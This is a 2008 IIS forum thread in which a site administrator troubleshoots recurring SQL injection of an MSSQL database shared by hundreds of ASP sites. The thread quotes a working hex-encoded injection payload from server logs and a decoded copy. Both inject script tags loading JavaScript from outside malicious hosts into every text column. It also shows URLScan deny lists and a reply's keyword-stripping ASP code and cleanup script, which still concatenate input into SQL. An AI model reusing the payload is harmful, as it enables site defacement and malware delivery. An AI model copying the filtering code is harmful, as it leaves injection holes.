my problem is that i have various websites that connect to the same database i need some sort of trigger that catches the update on the database with a <script in the update and tell me what site it came from. i have sanatized most of my code as well but
every 2-3 weeks 1 of my databases still gets infected.
would you have a trigger script i could install globaly on my sql server ?
i found this for today in my logs i noticed my database was infected this morning. happend last night this is the only declare in my log i wonder if they are using something else other than declare
here is a snibblet from the log of the urlscan you can see it kicks out the declare so how did it sneak through ? i have about 500 websites that connect to the database so its hard to pinpoint were or how it gets through
[08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected. Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'
If you are running the rtw version of URLScan3, the logs are w3c complient and you can use log parser against it. Also, in the logs you posted, have the SITEID property. That way would help narrow down which requests being blocked.
you could select the s-siteid property. You could sort it by ID ascending then compare. That is one way off-hand if you have a lot of sites hiting the db.
Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file. When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective.
You could have a recursive script copy the log to a single location then hit with log parser. Hope that helps.
when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder
write a decrypt script to decode the hex
#!/usr/bin/perl
my $s=<<"EOF";
4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72
EOF
while (length($s)>0) {
my $hex=substr($s,0,2); $s=substr($s,2,length($s));
my $ch=hex($hex); $ch=pack("C",$ch);
print $ch;
}
now decoded you notice that its what was in the wild
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.
i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files
it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)
ok i have no idea but somehow the urlscan is not working i put in the statemets of your config and it still got infected today. there must be some way around the declare statement.
is there any way to create a trigger on the mssql database to tell me what site the update injects the script code . since i never insert or update any of my tables with <script in it i think this will pinpoint were the attack is coming from.
my urlscan shows it blocking declare and other random injections but it still gets infected. so i would assume they are no longer using a declare statement. or have a way around the declare statement.
again over 500 sites connect to the same database so i have no idea how or where the injection comes from.
i am not a coder so i would not know where or how to write a trigger to store in a log file where the injection came from.
problem is that i can dump all the logs and parse through them but i dont know what to look for since the urlscan kicks out the declare it must be something else.
this is an sql injection attack. you must remove the <script ..... to ...</script>
it copies it self at the end of any text column it can.
in asp
<%
function stripQuotes(strWords)
stripQuotes = replace(strWords,
"'",
"''")
end
function
function killChars(strWords)
dim badChars
dim newCharsbadChars =
array("select ",
"drop ",
";",
"--",
"insert ",
"delete ",
"xp_",
" or ",
"or ")
newChars = strWords
for i = 0
to
uBound(badChars)
newChars = replace(newChars, badChars(i), "")
next
killChars = newChars
end
function
bco = stripQuotes(killChars(replace(request("bco"), "'", "")))
%>
you must use this on all requested data
you must even use it on things like request server variables
because the 1.js file link can be attached to os or ref server vars
do it on the backend as well or textbox or chk box radio if your requesting it it can be attached no need to worry about session objects unless you request an element and assign it to a session
object integers are not affected
this is a sample script of how to remove from the db
os is the text column
<% response.Buffer=False %>
<%
Server.ScriptTimeout = 50000
dim
pida(4500000)
dim
descr(4500000)
dim ldescr(4500000)
SQLStmt =
"SELECT osid, os From OS "
Set RS = dbSubs.Execute(SQLStmt)
do
while checkrs(rs)
if
len(rs("os")) > 0
then
pida(i) = rs("osid") descrx = replace(rs("os"),
"<script src=http://17gamo.com/1.js></script>" ,"")
descr(i) = replace(descrx, "'",
"")
i = I + 1
end
if
rs.movenext
loop
for p = 0
to (i -1)
response.Write pid &
" " & descr(p) &
"<br>"
SQLStmt =
"UPDATE OS SET os = '" & descr(p) &
"' WHERE osid= '" & pida(p) &
"' ; "
Set RS = dbSubs.Execute(SQLStmt)
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 03:38 PM|LINK
my problem is that i have various websites that connect to the same database i need some sort of trigger that catches the update on the database with a <script in the update and tell me what site it came from. i have sanatized most of my code as well but every 2-3 weeks 1 of my databases still gets infected.
would you have a trigger script i could install globaly on my sql server ?
thanks
silkyfixer
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 03:44 PM|LINK
i found this for today in my logs i noticed my database was infected this morning. happend last night this is the only declare in my log i wonder if they are using something else other than declare
GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765
steve schofi...
5681 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 04:14 PM|LINK
What is your urlscan.ini setup to look for.
[SQL Injection Raw]
AppliesTo=.asp,.aspx
Steve Schofield
Windows Server MVP - IIS
http://iislogs.com/steveschofield
http://www.IISLogs.com
Log archival solution
Install, Configure, Forget
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 05:20 PM|LINK
[Options]
UseDenyVerbs=1
UseDenyExtensions=1
NormalizeUrlBeforeScan=0
VerifyNormalization=0
AllowHighBitCharacters=1
AllowDotInPath=1
RemoveServerHeader=0
EnableLogging=1
PerProcessLogging=0
AllowLateScanning=0
PerDayLogging=1
UseFastPathReject=0
LogLongUrls=0
UnescapeQueryString=1
RejectResponseUrl=
LoggingDirectory=Logs
AlternateServerName=
RuleList=Edge
[Edge]
AppliesTo=.asp,.aspx,.inc
DenyDataSection=Edge Data
ScanURL=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
[Edge Data]
declare
DECLARE
cursor
CURSOR
[AllowVerbs]
GET
POST
HEAD
[DenyVerbs]
PROPFIND
CONNECT
[DenyExtensions]
.bat
.cmd
[DenyQueryStringSequences]
<
>
if i try to use some of the ones i find on the net it breaks most of my sites.
thanks for your time
silkyfixer
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 05:25 PM|LINK
here is a snibblet from the log of the urlscan you can see it kicks out the declare so how did it sneak through ? i have about 500 websites that connect to the database so its hard to pinpoint were or how it gets through
[08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected. Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'
steve schofi...
5681 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 08:22 PM|LINK
If you are running the rtw version of URLScan3, the logs are w3c complient and you can use log parser against it. Also, in the logs you posted, have the SITEID property. That way would help narrow down which requests being blocked.
you could select the s-siteid property. You could sort it by ID ascending then compare. That is one way off-hand if you have a lot of sites hiting the db.
http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx
Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file. When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective. You could have a recursive script copy the log to a single location then hit with log parser. Hope that helps.
Steve Schofield
Windows Server MVP - IIS
http://iislogs.com/steveschofield
http://www.IISLogs.com
Log archival solution
Install, Configure, Forget
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 10:22 PM|LINK
when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder write a decrypt script to decode the hex
#!/usr/bin/perl
my $s=<<"EOF";
4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72
EOF
while (length($s)>0) {
my $hex=substr($s,0,2); $s=substr($s,2,length($s));
my $ch=hex($hex); $ch=pack("C",$ch);
print $ch;
}
now decoded you notice that its what was in the wild
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.
i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files
it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 26, 2008 02:38 AM|LINK
ok i have no idea but somehow the urlscan is not working i put in the statemets of your config and it still got infected today. there must be some way around the declare statement.
is there any way to create a trigger on the mssql database to tell me what site the update injects the script code . since i never insert or update any of my tables with <script in it i think this will pinpoint were the attack is coming from.
my urlscan shows it blocking declare and other random injections but it still gets infected. so i would assume they are no longer using a declare statement. or have a way around the declare statement.
again over 500 sites connect to the same database so i have no idea how or where the injection comes from.
i am not a coder so i would not know where or how to write a trigger to store in a log file where the injection came from.
thank you
silkyfixer
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 26, 2008 04:21 AM|LINK
problem is that i can dump all the logs and parse through them but i dont know what to look for since the urlscan kicks out the declare it must be something else.
silkyfixer
Paul Bishop
3 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Dec 13, 2008 01:14 AM|LINK
this is an sql injection attack. you must remove the <script ..... to ...</script>
it copies it self at the end of any text column it can.
in asp
<%
function stripQuotes(strWords) stripQuotes = replace(strWords, "'", "''") end function
function killChars(strWords) dim badChars dim newCharsbadChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")newChars = strWords
for i = 0 to uBound(badChars) newChars = replace(newChars, badChars(i), "") nextkillChars = newChars
end function bco = stripQuotes(killChars(replace(request("bco"), "'", "")))%>
you must use this on all requested data
you must even use it on things like request server variables
because the 1.js file link can be attached to os or ref server vars
do it on the backend as well or textbox or chk box radio if your requesting it it can be attached no need to worry about session objects unless you request an element and assign it to a session object integers are not affected
this is a sample script of how to remove from the db
os is the text column
<% response.Buffer=False %><%
Server.ScriptTimeout = 50000
dim
pida(4500000)dim
descr(4500000) dim ldescr(4500000)SQLStmt =
"SELECT osid, os From OS " Set RS = dbSubs.Execute(SQLStmt) do while checkrs(rs) if len(rs("os")) > 0 then pida(i) = rs("osid") descrx = replace(rs("os"), "<script src=http://17gamo.com/1.js></script>" ,"")descr(i) = replace(descrx, "'", "")
i = I + 1
end if
rs.movenext
loop for p = 0 to (i -1)response.Write pid &
" " & descr(p) & "<br>"SQLStmt =
"UPDATE OS SET os = '" & descr(p) & "' WHERE osid= '" & pida(p) & "' ; " Set RS = dbSubs.Execute(SQLStmt)
next%>